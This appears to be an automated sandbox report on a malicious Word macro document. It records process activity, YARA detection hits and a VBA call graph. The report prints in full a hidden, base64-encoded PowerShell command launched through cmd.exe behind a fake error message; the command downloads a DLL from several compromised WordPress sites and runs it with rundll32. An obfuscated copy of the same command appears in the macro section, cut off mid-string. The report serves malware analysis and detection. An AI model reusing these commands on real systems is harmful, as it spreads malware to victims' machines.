                                              Jan 7, 2021 11:48:05.272717953 CET176INData Raw: 2f 70 6c 75 67 69 6e 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 61 73 73 65 74 73 2f 6c 69 62 2f 61 6e 69 6d 61 74 69 6f 6e 73 2f 61 6e 69 6d 61 74 69 6f 6e 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 30 2e 31 35 27 20 74 79 70 65 3d 27 74 65 78 74
                                              Data Ascii: /plugins/elementor/assets/lib/animations/animations.min.css?ver=3.0.15' type='text/css' media='all' /><link rel='stylesheet' id='elementor-frontend-legacy-css' href='http://thebestfikrah.com/wp-content/plugins/elementor/assets/css/frontend-l


                                              Code Manipulations

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:11:46:35
                                              Start date:07/01/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                              Imagebase:0x13fbf0000
                                              File size:1424032 bytes
                                              MD5 hash:95C38D04597050285A18F66039EDB456
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:11:46:37
                                              Start date:07/01/2021
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKwAnAG0AJwApACsAJwBwACcAKwAoACcAdQB0ACcAKwAnAGUAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAvAGMAJwArACcAbwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0AC8AVAAnACkAKwAoACcATAAvAEAAXQAnACsAJwBiACcAKwAnADIAWwBzACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAZAAtACcAKwAoACcAYwAnACsAJwBlAG0AJwArACcALgBjAG8AbQAnACkAKwAnAC8AJwArACcAdwBwACcAKwAoACcALQBhACcAKwAnAGQAJwApACsAKAAnAG0AJwArACcAaQBuACcAKQArACcALwAnACsAKAAnAEoAJwArACcAUwBMAHcARwAxACcAKQArACgAJwAvAEAAXQBiADIAWwBzACcAKwAnADoAJwArACcALwAnACkAKwAnAC8AJwArACgAJwB0AGgAZQBiAGUAcwAnACsAJwB0ACcAKQArACcAZgAnACsAKAAnAGkAawByAGEAJwArACcAaAAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGEAZABtACcAKwAnAGkAJwArACcAbgAvACcAKQArACgAJwBmACcAKwAnAE8ASQBsACcAKwAnAFYAWAAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAJwApACsAKAAnAHMAcwA6AC8AJwArACcALwAnACkAKwAoACcAcABoACcAKwAnAGEAdwAnACkAKwAoACcAYQB5AGEAJwArACcAZwBlACcAKQArACcAbgAnACsAKAAnAGMAeQAnACsAJwAuAGMAbwBtAC8AJwApACsAJwB3ACcAKwAnAHAAJwArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuACcAKwAoACcALwAnACsAJwBtAFgAbwAnACkAKwAnADQAYgAnACsAJwAvACcAKQAuACIAcgBlAHAAYABMAGAAQQBDAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyAFsAJwApACsAJwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABwAEwASQBUACIAKAAkAEUAXwBfAFYAIAArACAAJABZAHQAZABfAHAAcABiACAAKwAgACQAQwA1ADQAWQApADsAJABKADMANwBWAD0AKAAoACcARwA1ACcAKwAnADIAJwApACsAJwBDACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWQBmAHAAZAB2AHUAcgAgAGkAbgAgACQASQBsAGUAXwB2AGEAYQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQB3AC0AJwArACcATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwBZAHMAdABlAG0ALgBuAEUAdAAuAHcAZQBiAGMATABpAEUAbgBUACkALgAiAEQAbwBXAGAATgBgAGwAYABvAGEAZABmAEkAbABlACIAKAAkAFkAZgBwAGQAdgB1AHIALAAgACQAWgBjADcAbgA3AHkAXwApADsAJABXADAAMgBIAD0AKAAnAEMAJwArACgAJwA1ADkAJwArACcAWAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABaAGMANwBuADcAeQBfACkALgAiAEwARQBuAEcAYABUAEgAIgAgAC0AZwBlACAAMwA4ADQAMQAzACkAIAB7AC4AKAAnAHIAJwArACcAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAYwA3AG4ANwB5AF8ALAAoACcAQwBvACcAKwAoACcAbgB0ACcAKwAnAHIAbwAnACkAKwAoACcAbABfAFIAJwArACcAdQAnACsAJwBuAEQATAAnACkAKwAnAEwAJwApAC4AIgB0AG8AcwB0AGAAUgBgAEkATgBHACIAKAApADsAJABVADcAOABXAD0AKAAnAE0AMAAnACsAJwAxAE4AJwApADsAYgByAGUAYQBrADsAJABGADIANABUAD0AKAAnAEsAJwArACgAJwAzACcAKwAnADgATAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQAzADEASQA9ACgAJwBWACcAKwAoACcAOAAnACsAJwA4AEoAJwApACkA
                                              Imagebase:0x4a9a0000
                                              File size:345088 bytes
                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:11:46:38
                                              Start date:07/01/2021
                                              Path:C:\Windows\System32\msg.exe
                                              Wow64 process (32bit):false
                                              Commandline:msg user /v Word experienced an error trying to open the file.
                                              Imagebase:0xffe60000
                                              File size:26112 bytes
                                              MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:11:46:39
                                              Start date:07/01/2021
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKwAnAG0AJwApACsAJwBwACcAKwAoACcAdQB0ACcAKwAnAGUAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAvAGMAJwArACcAbwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0AC8AVAAnACkAKwAoACcATAAvAEAAXQAnACsAJwBiACcAKwAnADIAWwBzACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAZAAtACcAKwAoACcAYwAnACsAJwBlAG0AJwArACcALgBjAG8AbQAnACkAKwAnAC8AJwArACcAdwBwACcAKwAoACcALQBhACcAKwAnAGQAJwApACsAKAAnAG0AJwArACcAaQBuACcAKQArACcALwAnACsAKAAnAEoAJwArACcAUwBMAHcARwAxACcAKQArACgAJwAvAEAAXQBiADIAWwBzACcAKwAnADoAJwArACcALwAnACkAKwAnAC8AJwArACgAJwB0AGgAZQBiAGUAcwAnACsAJwB0ACcAKQArACcAZgAnACsAKAAnAGkAawByAGEAJwArACcAaAAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGEAZABtACcAKwAnAGkAJwArACcAbgAvACcAKQArACgAJwBmACcAKwAnAE8ASQBsACcAKwAnAFYAWAAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAJwApACsAKAAnAHMAcwA6AC8AJwArACcALwAnACkAKwAoACcAcABoACcAKwAnAGEAdwAnACkAKwAoACcAYQB5AGEAJwArACcAZwBlACcAKQArACcAbgAnACsAKAAnAGMAeQAnACsAJwAuAGMAbwBtAC8AJwApACsAJwB3ACcAKwAnAHAAJwArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuACcAKwAoACcALwAnACsAJwBtAFgAbwAnACkAKwAnADQAYgAnACsAJwAvACcAKQAuACIAcgBlAHAAYABMAGAAQQBDAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyAFsAJwApACsAJwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABwAEwASQBUACIAKAAkAEUAXwBfAFYAIAArACAAJABZAHQAZABfAHAAcABiACAAKwAgACQAQwA1ADQAWQApADsAJABKADMANwBWAD0AKAAoACcARwA1ACcAKwAnADIAJwApACsAJwBDACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWQBmAHAAZAB2AHUAcgAgAGkAbgAgACQASQBsAGUAXwB2AGEAYQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQB3AC0AJwArACcATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwBZAHMAdABlAG0ALgBuAEUAdAAuAHcAZQBiAGMATABpAEUAbgBUACkALgAiAEQAbwBXAGAATgBgAGwAYABvAGEAZABmAEkAbABlACIAKAAkAFkAZgBwAGQAdgB1AHIALAAgACQAWgBjADcAbgA3AHkAXwApADsAJABXADAAMgBIAD0AKAAnAEMAJwArACgAJwA1ADkAJwArACcAWAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABaAGMANwBuADcAeQBfACkALgAiAEwARQBuAEcAYABUAEgAIgAgAC0AZwBlACAAMwA4ADQAMQAzACkAIAB7AC4AKAAnAHIAJwArACcAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAYwA3AG4ANwB5AF8ALAAoACcAQwBvACcAKwAoACcAbgB0ACcAKwAnAHIAbwAnACkAKwAoACcAbABfAFIAJwArACcAdQAnACsAJwBuAEQATAAnACkAKwAnAEwAJwApAC4AIgB0AG8AcwB0AGAAUgBgAEkATgBHACIAKAApADsAJABVADcAOABXAD0AKAAnAE0AMAAnACsAJwAxAE4AJwApADsAYgByAGUAYQBrADsAJABGADIANABUAD0AKAAnAEsAJwArACgAJwAzACcAKwAnADgATAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQAzADEASQA9ACgAJwBWACcAKwAoACcAOAAnACsAJwA4AEoAJwApACkA
                                              Imagebase:0x13f410000
                                              File size:473600 bytes
                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2217570571.0000000001BA6000.00000004.00000001.sdmp, Author: Florian Roth
                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2217397039.0000000000106000.00000004.00000001.sdmp, Author: Florian Roth
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Call Graph

                                              Graph

                                              • Entrypoint
                                              • Decryption Function
                                              • Executed
                                              • Not Executed
                                              • Show Help
                                              callgraph 2 Nr8et74sjtle6s Len:1,Create:1,Mid:1,FreeFile:12,CreateObject:1 609 Tfizx5uxnfjbxnml FreeFile:4 2->609 x 2 801 Xrl25i0p5sd_oj40b Replace:1,FreeFile:2 609->801 913 Document_open 913->2

                                              Module: Jwq9b1lb0hmm7

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Jwq9b1lb0hmm7"

                                              Executed Functions
                                              APIsMeta Information

                                              Item

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              CreateObject

                                              CreateObject("winmgmts:win32_process")

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              Mid

                                              Len

                                              Len("\x01 ]b2[s]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[s/]b2[sc]b2[s ]b2[sm]b2[ss]b2[sg]b2[s ]b2[s%]b2[su]b2[ss]b2[se]b2[sr]b2[sn]b2[sa]b2[sm]b2[se]b2[s%]b2[s ]b2[s/]b2[sv]b2[s ]b2[sW]b2[so]b2[sr]b2[sd]b2[s ]b2[se]b2[sx]b2[sp]b2[se]b2[sr]b2[si]b2[se]b2[sn]b2[sc]b2[se]b2[sd]b2[s ]b2[sa]b2[sn]b2[s ]b2[se]b2[sr]b2[sr]b2[so]b2[sr]b2[s ]b2[st]b2[sr]b2[sy]b2[si]b2[sn]b2[sg]b2[s ]b2[st]b2[so]b2[s ]b2[so]b2[sp]b2[se]b2[sn]b2[s ]b2[st]b2[sh]b2[se]b2[s ]b2[sf]b2[si]b2[sl]b2[se]b2[s.]b2[s ]b2[s&]b2[s ]b2[s ]b2[sP]b2[s^]b2[sO]b2[sw]b2[s^]b2[se]b2[sr]b2[s^]b2[ss]b2[sh]b2[se]b2[s^]b2[sL]b2[s^]b2[sL]b2[s ]b2[s-]b2[sw]b2[s ]b2[sh]b2[si]b2[sd]b2[sd]b2[se]b2[sn]b2[s ]b2[s-]b2[sE]b2[sN]b2[sC]b2[sO]b2[sD]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s IA]b2[sAg]b2[sAC]b2[sQA]b2[sVQ]b2[sA2]b2[sAD]b2[sMA]b2[sNQ]b2[sAx]b2[sAD]b2[s0A]b2[sWw]b2[sBU]b2[sAF]b2[skA]b2[scA]b2[sBF]b2[sAF]b2[s0A]b2[sKA]b2[sAi]b2[sAH]b2[ssA]b2[sMg]b2[sB9]b2[sAH]b2[ssA]b2[sMA]b2[sB9]b2[sAH]b2[ssA]b2[sMQ]b2[sB9]b2[sAH]b2[ssA]b2[sNA]b2[sB9]b2[sAH]b2[ssA]b2[sMw]b2[sB9]b2[sAH]b2[ssA]b2[sNQ]b2[sB9]b2[sAC]b2[sIA]b2[sIA]b2[sAt]b2[sAE]b2[sYA]b2[sIA]b2[sAn]b2[sAH]b2[skA]b2[sUw]b2[sBU]b2[sAE]b2[sUA]b2[sbQ]b2[sAu]b2[sAG]b2[skA]b2[sJw]b2[sAs]b2[sAC]b2[scA]b2[sTw]b2[sAu]b2[sAG]b2[sQA]b2[saQ]b2[sAn]b2[sAC]b2[swA]b2[sJw]b2[sBz]b2[sAC]b2[scA]b2[sLA]b2[sAn]b2[sAE]b2[sUA]b2[sYw]b2[sBU]b2[sAE]b2[s8A]b2[sJw]b2[sAs]b2[sAC]b2[scA]b2[sUg]b2[sAn]b2[sAC]b2[swA]b2[sJw]b2[sBS]b2[sAF]b2[skA]b2[sJw]b2[sAp]b2[sAC]b2[sAA]b2[sIA]b2[sA7]b2[sAC]b2[sQA]b2[sTw]b2[sBM]b2[sAF]b2[sYA]b2[sIA]b2[sA9]b2[sAC]b2[sAA]b2[sWw]b2[sB0]b2[sAF]b2[skA]b2[scA]b2[sBl]b2[sAF]b2[s0A]b2[sKA]b2[sAi]b2[sAH]b2[ssA]b2[sMA]b2[sB9]b2[sAH]b2[ssA]b2[sNw]b2[sB9]b2[sAH]b2[ssA]b2[sMQ]b2[sB9]b2[sAH]b2[ssA]b2[sOA]b2[sB9]b2[sAH]b2[ssA]b2[sMw]b2[sB9]b2[sAH]b2[ssA]b2[sNg]b2[sB9]b2[sAH]b2[ssA]b2[sNQ]b2[sB9]b2[sAH]b2[ssA]b2[sMg]b2[sB9]b2[sAH]b2[ssA]b2[sNA]b2[sB9]b2[sAC]b2[sIA]b2[sIA]b2[sAt]b2[sAE]b2[sYA]b2[sJw]b2[sBz]b2[sAF]b2[skA]b2[sJw]b2[sAs]b2[sAC]b2[scA]b2[sVA]b2[sBF]b2[sAG]b2[s0A]b2[sLg]b2[sBO]b2[sAE]b2[sUA]b2[sJw]b2[sAs]b2[sAC]b2[scA]b2[sbg]b2[sB0]b2[sAG]b2[s0A]b2[sQQ]b2[sBO]b2[sAC]b2[scA]b2[sLA]b2[sAn]b2[sAH]b2[sYA]b2[sJw]b2[sAs]b2[sAC]b2[scA]b2[sQQ]b2[sBH]b2[sAG]b2[sUA]b2[sUg]b2[sAn]b2[sAC]b2[swA]b2[sJw]b2[sBJ]b2[sAC]b2[scA]b2[sLA]b2[sAn]b2[sAG]b2[skA]b2[sQw]b2[sBl]b2[sAF]b2[sAA]b2[sTw]b2[sAn]b2[sAC]b2[swA]b2[sJw]b2[sBz]b2[sAC]b2[scA]b2[sLA]b2[sAn]b2[sAF